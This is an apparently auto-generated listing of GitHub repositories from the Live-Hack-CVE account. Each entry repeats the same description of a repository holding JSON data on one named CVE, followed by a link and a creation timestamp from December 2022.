**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44595](https://github.com/Live-Hack-CVE/CVE-2021-44595) create time: 2022-12-26T01:17:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44596](https://github.com/Live-Hack-CVE/CVE-2021-44596) create time: 2022-12-26T01:16:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44269](https://github.com/Live-Hack-CVE/CVE-2021-44269) create time: 2022-12-26T01:16:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41772](https://github.com/Live-Hack-CVE/CVE-2021-41772) create time: 2022-12-26T01:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46379](https://github.com/Live-Hack-CVE/CVE-2021-46379) create time: 2022-12-26T01:13:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43481](https://github.com/Live-Hack-CVE/CVE-2021-43481) create time: 2022-12-26T00:42:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22570 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22570](https://github.com/Live-Hack-CVE/CVE-2021-22570) create time: 2022-12-26T00:42:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32570 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32570](https://github.com/Live-Hack-CVE/CVE-2021-32570) create time: 2022-12-26T00:41:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40663 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40663](https://github.com/Live-Hack-CVE/CVE-2021-40663) create time: 2022-12-26T00:40:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41275](https://github.com/Live-Hack-CVE/CVE-2021-41275) create time: 2022-12-26T00:39:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36782](https://github.com/Live-Hack-CVE/CVE-2021-36782) create time: 2022-12-26T00:39:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41081](https://github.com/Live-Hack-CVE/CVE-2021-41081) create time: 2022-12-26T00:39:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26337](https://github.com/Live-Hack-CVE/CVE-2021-26337) create time: 2022-12-26T00:39:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43775](https://github.com/Live-Hack-CVE/CVE-2021-43775) create time: 2022-12-26T00:39:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41080 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41080](https://github.com/Live-Hack-CVE/CVE-2021-41080) create time: 2022-12-26T00:39:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41116](https://github.com/Live-Hack-CVE/CVE-2021-41116) create time: 2022-12-26T00:38:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41115](https://github.com/Live-Hack-CVE/CVE-2021-41115) create time: 2022-12-26T00:38:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45958 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45958](https://github.com/Live-Hack-CVE/CVE-2021-45958) create time: 2022-12-26T00:38:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41819](https://github.com/Live-Hack-CVE/CVE-2021-41819) create time: 2022-12-26T00:38:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41817 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41817](https://github.com/Live-Hack-CVE/CVE-2021-41817) create time: 2022-12-26T00:38:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22106](https://github.com/Live-Hack-CVE/CVE-2022-22106) create time: 2022-12-26T01:24:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39050](https://github.com/Live-Hack-CVE/CVE-2022-39050) create time: 2022-12-26T01:24:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22104](https://github.com/Live-Hack-CVE/CVE-2022-22104) create time: 2022-12-26T01:24:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22101](https://github.com/Live-Hack-CVE/CVE-2022-22101) create time: 2022-12-26T01:23:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36584](https://github.com/Live-Hack-CVE/CVE-2022-36584) create time: 2022-12-26T01:23:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37839](https://github.com/Live-Hack-CVE/CVE-2022-37839) create time: 2022-12-26T01:23:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37840](https://github.com/Live-Hack-CVE/CVE-2022-37840) create time: 2022-12-26T01:23:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37841](https://github.com/Live-Hack-CVE/CVE-2022-37841) create time: 2022-12-26T01:23:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37842](https://github.com/Live-Hack-CVE/CVE-2022-37842) create time: 2022-12-26T01:23:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21385](https://github.com/Live-Hack-CVE/CVE-2022-21385) create time: 2022-12-26T01:23:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37843](https://github.com/Live-Hack-CVE/CVE-2022-37843) create time: 2022-12-26T01:22:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40110 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40110](https://github.com/Live-Hack-CVE/CVE-2022-40110) create time: 2022-12-26T01:22:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26467](https://github.com/Live-Hack-CVE/CVE-2022-26467) create time: 2022-12-26T01:21:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26468 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26468](https://github.com/Live-Hack-CVE/CVE-2022-26468) create time: 2022-12-26T01:21:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26469](https://github.com/Live-Hack-CVE/CVE-2022-26469) create time: 2022-12-26T01:21:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26470](https://github.com/Live-Hack-CVE/CVE-2022-26470) create time: 2022-12-26T01:21:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27491](https://github.com/Live-Hack-CVE/CVE-2022-27491) create time: 2022-12-26T01:21:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2233 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2233](https://github.com/Live-Hack-CVE/CVE-2022-2233) create time: 2022-12-26T01:20:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3026](https://github.com/Live-Hack-CVE/CVE-2022-3026) create time: 2022-12-26T01:20:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36425 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36425](https://github.com/Live-Hack-CVE/CVE-2022-36425) create time: 2022-12-26T01:20:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35931](https://github.com/Live-Hack-CVE/CVE-2022-35931) create time: 2022-12-26T01:20:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35847](https://github.com/Live-Hack-CVE/CVE-2022-35847) create time: 2022-12-26T01:20:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34867](https://github.com/Live-Hack-CVE/CVE-2022-34867) create time: 2022-12-26T01:20:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32264](https://github.com/Live-Hack-CVE/CVE-2022-32264) create time: 2022-12-26T01:20:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2402](https://github.com/Live-Hack-CVE/CVE-2022-2402) create time: 2022-12-26T01:20:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37253](https://github.com/Live-Hack-CVE/CVE-2022-37253) create time: 2022-12-26T01:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36387](https://github.com/Live-Hack-CVE/CVE-2022-36387) create time: 2022-12-26T01:20:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30298](https://github.com/Live-Hack-CVE/CVE-2022-30298) create time: 2022-12-26T01:20:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36427](https://github.com/Live-Hack-CVE/CVE-2022-36427) create time: 2022-12-26T01:20:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34656](https://github.com/Live-Hack-CVE/CVE-2022-34656) create time: 2022-12-26T01:20:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2001-1583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2001-1583](https://github.com/Live-Hack-CVE/CVE-2001-1583) create time: 2022-12-25T23:20:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-1229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-1229](https://github.com/Live-Hack-CVE/CVE-2003-1229) create time: 2022-12-25T23:20:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-2179 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-2179](https://github.com/Live-Hack-CVE/CVE-2010-2179) create time: 2022-12-25T22:38:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0031](https://github.com/Live-Hack-CVE/CVE-2012-0031) create time: 2022-12-25T23:14:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0053 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0053](https://github.com/Live-Hack-CVE/CVE-2012-0053) create time: 2022-12-25T23:14:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0883](https://github.com/Live-Hack-CVE/CVE-2012-0883) create time: 2022-12-25T23:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3160](https://github.com/Live-Hack-CVE/CVE-2012-3160) create time: 2022-12-25T22:33:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3197](https://github.com/Live-Hack-CVE/CVE-2012-3197) create time: 2022-12-25T22:33:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6438 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6438](https://github.com/Live-Hack-CVE/CVE-2013-6438) create time: 2022-12-25T23:15:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2249](https://github.com/Live-Hack-CVE/CVE-2013-2249) create time: 2022-12-25T23:15:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1896](https://github.com/Live-Hack-CVE/CVE-2013-1896) create time: 2022-12-25T23:14:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1862](https://github.com/Live-Hack-CVE/CVE-2013-1862) create time: 2022-12-25T23:14:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1502 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1502](https://github.com/Live-Hack-CVE/CVE-2013-1502) create time: 2022-12-25T22:33:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0226](https://github.com/Live-Hack-CVE/CVE-2014-0226) create time: 2022-12-25T23:15:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0118](https://github.com/Live-Hack-CVE/CVE-2014-0118) create time: 2022-12-25T23:15:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0098 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0098](https://github.com/Live-Hack-CVE/CVE-2014-0098) create time: 2022-12-25T23:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6551](https://github.com/Live-Hack-CVE/CVE-2014-6551) create time: 2022-12-25T22:33:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0401 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0401](https://github.com/Live-Hack-CVE/CVE-2014-0401) create time: 2022-12-25T22:33:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4792](https://github.com/Live-Hack-CVE/CVE-2015-4792) create time: 2022-12-25T22:33:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11237 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11237](https://github.com/Live-Hack-CVE/CVE-2018-11237) create time: 2022-12-25T23:18:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18960 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18960](https://github.com/Live-Hack-CVE/CVE-2019-18960) create time: 2022-12-25T23:18:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19159](https://github.com/Live-Hack-CVE/CVE-2020-19159) create time: 2022-12-25T23:18:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7793](https://github.com/Live-Hack-CVE/CVE-2020-7793) create time: 2022-12-25T23:18:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28168 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28168](https://github.com/Live-Hack-CVE/CVE-2020-28168) create time: 2022-12-25T23:18:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22017](https://github.com/Live-Hack-CVE/CVE-2020-22017) create time: 2022-12-25T23:18:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35557](https://github.com/Live-Hack-CVE/CVE-2020-35557) create time: 2022-12-25T23:16:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35566](https://github.com/Live-Hack-CVE/CVE-2020-35566) create time: 2022-12-25T23:16:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35568](https://github.com/Live-Hack-CVE/CVE-2020-35568) create time: 2022-12-25T23:16:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35561](https://github.com/Live-Hack-CVE/CVE-2020-35561) create time: 2022-12-25T23:16:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35570 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35570](https://github.com/Live-Hack-CVE/CVE-2020-35570) create time: 2022-12-25T23:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35558](https://github.com/Live-Hack-CVE/CVE-2020-35558) create time: 2022-12-25T23:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21652](https://github.com/Live-Hack-CVE/CVE-2020-21652) create time: 2022-12-25T23:13:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21651](https://github.com/Live-Hack-CVE/CVE-2020-21651) create time: 2022-12-25T23:13:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20746](https://github.com/Live-Hack-CVE/CVE-2020-20746) create time: 2022-12-25T23:13:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19003 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19003](https://github.com/Live-Hack-CVE/CVE-2020-19003) create time: 2022-12-25T23:13:18Z

